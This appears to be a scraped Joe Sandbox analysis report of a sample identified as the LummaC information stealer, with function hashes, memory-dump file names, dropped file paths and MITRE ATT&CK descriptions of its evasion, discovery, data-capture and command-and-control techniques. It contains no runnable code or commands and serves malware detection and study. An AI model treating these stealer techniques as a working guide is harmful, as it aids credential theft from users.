Instruction Fuzzy Hash: 0F21FB77E619204BE310CD56CC807527796A7C9338F3EC6B8C9689B392D93BAD0386C4

Function 002FBCDB Relevance: .1, Instructions: 76COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000001.00000002.2950072845.00000000002C1000.00000020.00000001.01000000.00000007.sdmp, Offset: 002C0000, based on PE: true

Associated: 00000001.00000002.2950051980.00000000002C0000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000001.00000002.2950102035.0000000000300000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000001.00000002.2950115560.0000000000303000.00000008.00000001.01000000.00000007.sdmpDownload File
Associated: 00000001.00000002.2950128231.0000000000307000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000001.00000002.2950140761.0000000000311000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_2c0000_LummaC2.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 22014bdcb11526e0a93f5afddb1652f32102272d9c7b80cb52803ee5b73a970a
Instruction ID: 15331736420be31ab64b4964cb40642b558599e3b75c00c4f5c303ca83d93423
Opcode Fuzzy Hash: 22014bdcb11526e0a93f5afddb1652f32102272d9c7b80cb52803ee5b73a970a
Instruction Fuzzy Hash: 40113336E242168BCB19CF28C8512BAF7B2AB85340B19C165C955A7308E738A812CBD4

Function 002D9605 Relevance: .1, Instructions: 76COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000001.00000002.2950072845.00000000002C1000.00000020.00000001.01000000.00000007.sdmp, Offset: 002C0000, based on PE: true

Associated: 00000001.00000002.2950051980.00000000002C0000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000001.00000002.2950102035.0000000000300000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000001.00000002.2950115560.0000000000303000.00000008.00000001.01000000.00000007.sdmpDownload File
Associated: 00000001.00000002.2950128231.0000000000307000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000001.00000002.2950140761.0000000000311000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_2c0000_LummaC2.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: d6767e63557cf36e95e31bbb57829f9dea4ad7aa7b0715b2edf5c90a5397c3fa
Instruction ID: 35f231e62521e91440a0f2bd642c7c8fd9fbcabd39423840f00b5c65962b21d8
Opcode Fuzzy Hash: d6767e63557cf36e95e31bbb57829f9dea4ad7aa7b0715b2edf5c90a5397c3fa
Instruction Fuzzy Hash: 6821A73161D7518BC77A8F24E4A12ABB39ABBD5714F554A3EC4CB43310CB319C92C781

Function 002E8640 Relevance: .1, Instructions: 64COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000001.00000002.2950072845.00000000002C1000.00000020.00000001.01000000.00000007.sdmp, Offset: 002C0000, based on PE: true

Associated: 00000001.00000002.2950051980.00000000002C0000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000001.00000002.2950102035.0000000000300000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000001.00000002.2950115560.0000000000303000.00000008.00000001.01000000.00000007.sdmpDownload File
Associated: 00000001.00000002.2950128231.0000000000307000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000001.00000002.2950140761.0000000000311000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_2c0000_LummaC2.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 18513ee5277e6e030aca1ca8d9a7f6ed3ab0b8a9f6b66cbf4405e67b7eca6090
Instruction ID: 5ebed555091104004c35fe387c3b9b638889a57fd4cda4dba54b947c58d66013
Opcode Fuzzy Hash: 18513ee5277e6e030aca1ca8d9a7f6ed3ab0b8a9f6b66cbf4405e67b7eca6090
Instruction Fuzzy Hash: 7E01683599A211DFCB098F11C46143BF7F9EB89714F54982CD1C263212CB38EC168F82

Function 002E9DA0 Relevance: .1, Instructions: 63COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000001.00000002.2950072845.00000000002C1000.00000020.00000001.01000000.00000007.sdmp, Offset: 002C0000, based on PE: true

Associated: 00000001.00000002.2950051980.00000000002C0000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000001.00000002.2950102035.0000000000300000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000001.00000002.2950115560.0000000000303000.00000008.00000001.01000000.00000007.sdmpDownload File
Associated: 00000001.00000002.2950128231.0000000000307000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000001.00000002.2950140761.0000000000311000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_2c0000_LummaC2.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 2e7b69c494abd83f6118a72f7de64ff912b6fa8dc0b82fccbac9464bcbb27eac
Instruction ID: 9197717c64bd12eb207826ee405fbef4d9c1b77e10374b416a5b4de41afc9916
Opcode Fuzzy Hash: 2e7b69c494abd83f6118a72f7de64ff912b6fa8dc0b82fccbac9464bcbb27eac
Instruction Fuzzy Hash: 4E01D4F165035247DB20EE16D8C0B2BB2E86F81704F4C052EE90847302EB72FC74CAA1

Function 002D46C0 Relevance: .0, Instructions: 47COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000001.00000002.2950072845.00000000002C1000.00000020.00000001.01000000.00000007.sdmp, Offset: 002C0000, based on PE: true

Associated: 00000001.00000002.2950051980.00000000002C0000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000001.00000002.2950102035.0000000000300000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000001.00000002.2950115560.0000000000303000.00000008.00000001.01000000.00000007.sdmpDownload File
Associated: 00000001.00000002.2950128231.0000000000307000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000001.00000002.2950140761.0000000000311000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_2c0000_LummaC2.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 7a984843b570b7378253929d1441754c9cdf9516a4ccd76f455c2bd59a9e2d53
Instruction ID: 67658bfb04ada51708228ad61c5990b04f12968bca8955021ccf1c4ebc0d803c
Opcode Fuzzy Hash: 7a984843b570b7378253929d1441754c9cdf9516a4ccd76f455c2bd59a9e2d53
Instruction Fuzzy Hash: B201D67BA113138B8324DE5CC4D06ABB3B0FF96795B2A945ED5815F3B0D7319D25C260

Function 002E10F3 Relevance: .0, Instructions: 11COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000001.00000002.2950072845.00000000002C1000.00000020.00000001.01000000.00000007.sdmp, Offset: 002C0000, based on PE: true

Associated: 00000001.00000002.2950051980.00000000002C0000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000001.00000002.2950102035.0000000000300000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000001.00000002.2950115560.0000000000303000.00000008.00000001.01000000.00000007.sdmpDownload File
Associated: 00000001.00000002.2950128231.0000000000307000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000001.00000002.2950140761.0000000000311000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_2c0000_LummaC2.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 12f178f30f3e40b687432ae1b09ccb3612f5ac667008cf50a7aa7b0e45ade70d
Instruction ID: af948ea6a46bcccb6fc0fbcfe521553fc386b28422c45da3c322902efaadd05f
Opcode Fuzzy Hash: 12f178f30f3e40b687432ae1b09ccb3612f5ac667008cf50a7aa7b0e45ade70d
Instruction Fuzzy Hash: 98B092F5C1A4108798122A103D42AAAB0680B13204F08213DE80622606BA17E32A8C9F

Function 002E34B7 Relevance: 9.0, APIs: 1, Strings: 4, Instructions: 246COMMON

Download Yara Rule

APIs

GetLogicalDrives.KERNEL32 ref: 002E3606

Strings

uw, xrefs: 002E3503
pz, xrefs: 002E36BA
pz, xrefs: 002E376E, 002E34A8
xs, xrefs: 002E34FC

Memory Dump Source

Source File: 00000001.00000002.2950072845.00000000002C1000.00000020.00000001.01000000.00000007.sdmp, Offset: 002C0000, based on PE: true

Associated: 00000001.00000002.2950051980.00000000002C0000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000001.00000002.2950102035.0000000000300000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000001.00000002.2950115560.0000000000303000.00000008.00000001.01000000.00000007.sdmpDownload File
Associated: 00000001.00000002.2950128231.0000000000307000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000001.00000002.2950140761.0000000000311000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_2c0000_LummaC2.jbxd

Similarity

API ID: DrivesLogical
String ID: pz$pz$uw$xs
API String ID: 999431828-3977666006
Opcode ID: aa0563020ffd05889580e17a5947ed0dcce450565b1de615b85b03c869f9ec48
Instruction ID: e9c9cc6584c39981902f22dcc21fdd17e383d774ed2e49129ecf23d5312b5f18
Opcode Fuzzy Hash: aa0563020ffd05889580e17a5947ed0dcce450565b1de615b85b03c869f9ec48
Instruction Fuzzy Hash: 498122B5911206CFCB14CF65D891AAABBB0FF1A304F4992A8D445AF722E334D941CFC0

Description:	Adversaries may abuse command and script interpreters to execute commands, scripts, or binaries. These interfaces and languages provide ways of interacting with computer systems and are a common feature across many different platforms. Most systems come with some built-in command-line interface and scripting capabilities, for example, macOS and Linux distributions include some flavor of Unix Shell while Windows installations include the Windows Command Shell and PowerShell .
Tactics:	Execution
Data Sources:	Command: Command Execution, Module: Module Load, Process: Process Creation, Process: Process Metadata, Script: Script Execution
Platforms:	Azure AD, Google Workspace, IaaS, Linux, macOS, Network, Office 365, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may abuse PowerShell commands and scripts for execution. PowerShell is a powerful interactive command-line interface and scripting environment included in the Windows operating system.Adversaries can use PowerShell to perform a number of actions, including discovery of information and execution of code. Examples include the `Start-Process` cmdlet which can be used to run an executable and the `Invoke-Command` cmdlet which runs a command locally or on a remote computer (though administrator permissions are required to use PowerShell to connect to remote systems).
Tactics:	Execution
Data Sources:	Command: Command Execution, Module: Module Load, Process: Process Creation, Process: Process Metadata, Script: Script Execution
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may execute their own malicious payloads by side-loading DLLs. Similar to DLL Search Order Hijacking , side-loading involves hijacking which DLL a program loads. But rather than just planting the DLL within the search order of a program then waiting for the victim application to be invoked, adversaries may directly side-load their payloads by planting then invoking a legitimate application that executes their payload(s).
Tactics:	Defense Evasion, Persistence, Privilege Escalation
Data Sources:	File: File Creation, File: File Modification, Module: Module Load, Process: Process Creation
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may inject code into processes in order to evade process-based defenses as well as possibly elevate privileges. Process injection is a method of executing arbitrary code in the address space of a separate live process. Running code in the context of another process may allow access to the process's memory, system/network resources, and possibly elevated privileges. Execution via process injection may also evade detection from security products since the execution is masked under a legitimate process.
Tactics:	Defense Evasion, Privilege Escalation
Data Sources:	File: File Metadata, File: File Modification, Module: Module Load, Process: OS API Execution, Process: Process Access, Process: Process Metadata, Process: Process Modification
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to manipulate features of their artifacts to make them appear legitimate or benign to users and/or security tools. Masquerading occurs when the name or location of an object, legitimate or malicious, is manipulated or abused for the sake of evading defenses and observation. This may include manipulating file metadata, tricking users into misidentifying the file type, and giving legitimate task or service names.
Tactics:	Defense Evasion
Data Sources:	Command: Command Execution, File: File Metadata, File: File Modification, Image: Image Metadata, Process: OS API Execution, Process: Process Creation, Process: Process Metadata, Scheduled Job: Scheduled Job Metadata, Scheduled Job: Scheduled Job Modification, Service: Service Creation, Service: Service Metadata
Platforms:	Containers, Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may modify and/or disable security tools to avoid possible detection of their malware/tools and activities. This may take many forms, such as killing security software processes or services, modifying / deleting Registry keys or configuration files so that tools do not operate properly, or other methods to interfere with security tools scanning or reporting information. Adversaries may also disable updates to prevent the latest security patches from reaching tools on victim systems.
Tactics:	Defense Evasion
Data Sources:	Command: Command Execution, Driver: Driver Load, Process: Process Creation, Process: Process Termination, Sensor Health: Host Status, Service: Service Metadata, Windows Registry: Windows Registry Key Deletion, Windows Registry: Windows Registry Key Modification
Platforms:	Containers, IaaS, Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may employ various means to detect and avoid virtualization and analysis environments. This may include changing behaviors based on the results of checks for the presence of artifacts indicative of a virtual machine environment (VME) or sandbox. If the adversary detects a VME, they may alter their malware to disengage from the victim or conceal the core functions of the implant. They may also search for VME artifacts before dropping secondary or additional payloads. Adversaries may use the information learned from [Virtualization/Sandbox Evasion](https://attack.mitre.org/techniques/T1497) during automated discovery to shape follow-on behaviors.
Tactics:	Defense Evasion, Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may use Obfuscated Files or Information to hide artifacts of an intrusion from analysis. They may require separate mechanisms to decode or deobfuscate that information depending on how they intend to use it. Methods for doing that include built-in functionality of malware or by using utilities present on the system.
Tactics:	Defense Evasion
Data Sources:	File: File Modification, Process: Process Creation, Script: Script Execution
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to make an executable or file difficult to discover or analyze by encrypting, encoding, or otherwise obfuscating its contents on the system or in transit. This is common behavior that can be used across different platforms and the network to evade defenses.
Tactics:	Defense Evasion
Data Sources:	Command: Command Execution, File: File Creation, File: File Metadata, Module: Module Load, Process: OS API Execution, Process: Process Creation, Script: Script Execution, WMI: WMI Creation, Windows Registry: Windows Registry Key Creation
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may perform software packing or virtual machine software protection to conceal their code. Software packing is a method of compressing or encrypting an executable. Packing an executable changes the file signature in an attempt to avoid signature-based detection. Most decompression techniques decompress the executable code in memory. Virtual machine software protection translates an executable's original code into a special format that only a special virtual machine can run. A virtual machine is then called to run this code.
Tactics:	Defense Evasion
Data Sources:	File: File Metadata
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to get a listing of security software, configurations, defensive tools, and sensors that are installed on a system or in a cloud environment. This may include things such as firewall rules and anti-virus. Adversaries may use the information from Security Software Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Firewall: Firewall Enumeration, Firewall: Firewall Metadata, Process: OS API Execution, Process: Process Creation
Platforms:	Azure AD, Google Workspace, IaaS, Linux, macOS, Office 365, SaaS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to get information about running processes on a system. Information obtained could be used to gain an understanding of common software/applications running on systems within the network. Adversaries may use the information from Process Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may enumerate files and directories or may search in specific locations of a host or network share for certain information within a file system. Adversaries may use the information from File and Directory Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	An adversary may attempt to get detailed information about the operating system and hardware, including version, patches, hotfixes, service packs, and architecture. Adversaries may use the information from System Information Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	IaaS, Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to take screen captures of the desktop to gather information over the course of an operation. Screen capturing functionality may be included as a feature of a remote access tool used in post-compromise operations. Taking a screenshot is also typically possible through native utilities or API calls, such as `CopyFromScreen` , `xwd` , or `screencapture` .
Tactics:	Collection
Data Sources:	Command: Command Execution, Process: OS API Execution
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	An adversary may compress and/or encrypt data that is collected prior to exfiltration. Compressing the data can help to obfuscate the collected data and minimize the amount of data sent over the network. Encryption can be used to hide information that is being exfiltrated from detection or make exfiltration less conspicuous upon inspection by a defender.
Tactics:	Collection
Data Sources:	Command: Command Execution, File: File Creation, Process: Process Creation, Script: Script Execution
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may collect data stored in the clipboard from users copying information within or between applications.
Tactics:	Collection
Data Sources:	Command: Command Execution, Process: OS API Execution
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may employ a known encryption algorithm to conceal command and control traffic rather than relying on any inherent protections provided by a communication protocol. Despite the use of a secure algorithm, these implementations may be vulnerable to reverse engineering if secret keys are encoded and/or generated within malware samples/configuration files.
Tactics:	Command and Control
Data Sources:	Network Traffic: Network Traffic Content
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may transfer tools or other files from an external system into a compromised environment. Tools or files may be copied from an external adversary-controlled system to the victim network through the command and control channel or through alternate protocols such as ftp . Once present, adversaries may also transfer/spread tools between victim devices within a compromised environment (i.e. Lateral Tool Transfer ).
Tactics:	Command and Control
Data Sources:	Command: Command Execution, File: File Creation, Network Traffic: Network Connection Creation, Network Traffic: Network Traffic Content, Network Traffic: Network Traffic Flow
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may use an OSI non-application layer protocol for communication between host and C2 server or among infected hosts within a network. The list of possible protocols is extensive.Specific examples include use of network layer protocols, such as the Internet Control Message Protocol (ICMP), transport layer protocols, such as the User Datagram Protocol (UDP), session layer protocols, such as Socket Secure (SOCKS), as well as redirected/tunneled protocols, such as Serial over LAN (SOL).
Tactics:	Command and Control
Data Sources:	Network Traffic: Network Traffic Content, Network Traffic: Network Traffic Flow
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Behavior Section

Behavior Chronological

Disassembly

Uncategorized

Graph

Loading Joe Sandbox Report ...

Warning!

Windows Analysis Report YrxiR3yCLm.exe

Overview

General Information

Detection

Signatures

Classification

Process Tree

Malware Threat Intel

Malware Configuration

Threatname: LummaC

Yara Signatures

Memory Dumps

Unpacked PEs

Sigma Signatures

Suricata Signatures

Joe Sandbox Signatures

AV Detection

Cryptography

Compliance

Software Vulnerabilities

Networking

Key, Mouse, Clipboard, Microphone and Screen Capturing

System Summary

Data Obfuscation

Persistence and Installation Behavior

Boot Survival

Hooking and other Techniques for Hiding and Protection

Malware Analysis System Evasion

Anti Debugging

HIPS / PFW / Operating System Protection Evasion

Language, Device and Operating System Detection

Lowering of HIPS / PFW / Operating System Security Settings

Stealing of Sensitive Information

Remote Access Functionality

Mitre Att&ck Matrix

Behavior Graph

Screenshots

Thumbnails

Antivirus, Machine Learning and Genetic Malware Detection

Initial Sample

Dropped Files

Unpacked PE Files

Domains

URLs

Domains and IPs

Contacted Domains

Contacted URLs

URLs from Memory and Binaries

World Map of Contacted IPs

Public IPs

General Information

Warnings

Simulations

Behavior and APIs

Joe Sandbox View / Context

IPs

Domains

ASNs

JA3 Fingerprints

Dropped Files

Created / dropped Files

C:\Users\user\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\YrxiR3yCLm.exe.log

C:\Users\user\AppData\Local\Temp\LummaC2.exe

C:\Users\user\AppData\Local\Temp\Set-up.exe

Static File Info

General

File Icon

Static PE Info

General

Entrypoint Preview

Data Directories

Sections

Resources

Windows Analysis Report
YrxiR3yCLm.exe

Function 002F5135 Relevance: 65.4, Strings: 52, Instructions: 388
COMMON

Function 002C8720 Relevance: 7.7, APIs: 5, Instructions: 235
threadCOMMON

Function 002FBAD0 Relevance: 1.5, APIs: 1, Instructions: 14
libraryCOMMON

Function 002FC59C Relevance: 1.3, Strings: 1, Instructions: 70
COMMON

Function 002FEEC0 Relevance: .1, Instructions: 141
COMMON

Function 002FBC91 Relevance: 1.5, APIs: 1, Instructions: 20
COMMON

Function 002FA080 Relevance: 1.5, APIs: 1, Instructions: 9
memoryCOMMON

Function 002F483C Relevance: 34.0, Strings: 27, Instructions: 298
COMMON

Function 002F1D10 Relevance: 28.2, APIs: 2, Strings: 14, Instructions: 163
COMMON

Description:	Adversaries may communicate using OSI application layer protocols to avoid detection/network filtering by blending in with existing traffic. Commands to the remote system, and often the results of those commands, will be embedded within the protocol traffic between the client and server.
Tactics:	Command and Control
Data Sources:	Network Traffic: Network Traffic Content, Network Traffic: Network Traffic Flow
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre